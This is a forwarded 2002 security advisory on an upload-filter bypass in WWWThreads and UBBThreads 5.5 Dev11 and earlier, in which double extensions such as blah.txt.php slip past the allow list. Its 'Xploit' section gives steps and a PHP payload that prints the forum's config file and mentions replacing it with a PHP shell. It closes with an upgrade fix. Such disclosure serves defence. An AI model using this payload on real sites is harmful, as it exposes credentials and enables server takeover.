wwwthreads-5.5.txt

`---------- Forwarded message ----------  
Date: 30 Jan 2002 22:12:17 -0000  
From: Root Extractor <[email protected]>  
To: [email protected]  
Subject: [ WWWThreads, UBBThreads ] Security Hole in upload system  
  
  
  
[ WWWThreads, UBBThreads ] Security Hole in  
upload system  
  
Author: RootExtractor, CompuMe  
[email protected], [email protected]  
  
I. Details  
II. Vulnerable ver's  
III. Example, Xploit  
IV. Solution  
  
Details :  
  
..: config.inc.php :..  
- ------------------------- snip ------------------------------  
  
// $config['excludefiles']  
= ".php,.asp,.js,.vbs,.sht,.htm";  
$config['allowfiles'] = ".zip,.txt,.gif,.jpg,.jpeg,.bmp";  
  
- ------------------------- snip ------------------------------  
  
  
that files that were not listed in the allow files could  
still be uploaded. Seems you checked the extension  
but if someone added an allowable extension first  
before the bogus extension the file would upload.  
  
vulnerable :  
WWWThreads and UBBThreads 5.5 Dev11 and piror  
  
not vulnerable :  
UBBThreads 5.5  
  
Example :  
you allow the upload or .txt,.jpg,.bmp,.zip  
all files that don't have those extensions should not  
be uploaded  
However if somebody changes the name of the file to  
blah.txt.php the file will validate and upload......huh !  
  
Xploit :  
1) make new file $ touch blah.txt.php  
2) edit it $ vi blah.txt.php (in this step, write a php  
code, for example)  
  
<?php  
$readfile = join("", file  
("../config.inc.php"));  
print $readfile;  
?>  
  
3) save & upload it  
4) visit your blah file, now you can to see a config file  
of your victim forum  
5) i'm replaced readfile code by php shell file  
  
  
Solution :  
visit infopop.com and download ubbthreads 5.5  
http://www.infopop.com/  
  
  
Copyright 2002 recm security team  
http://hop.to/condor  
  
`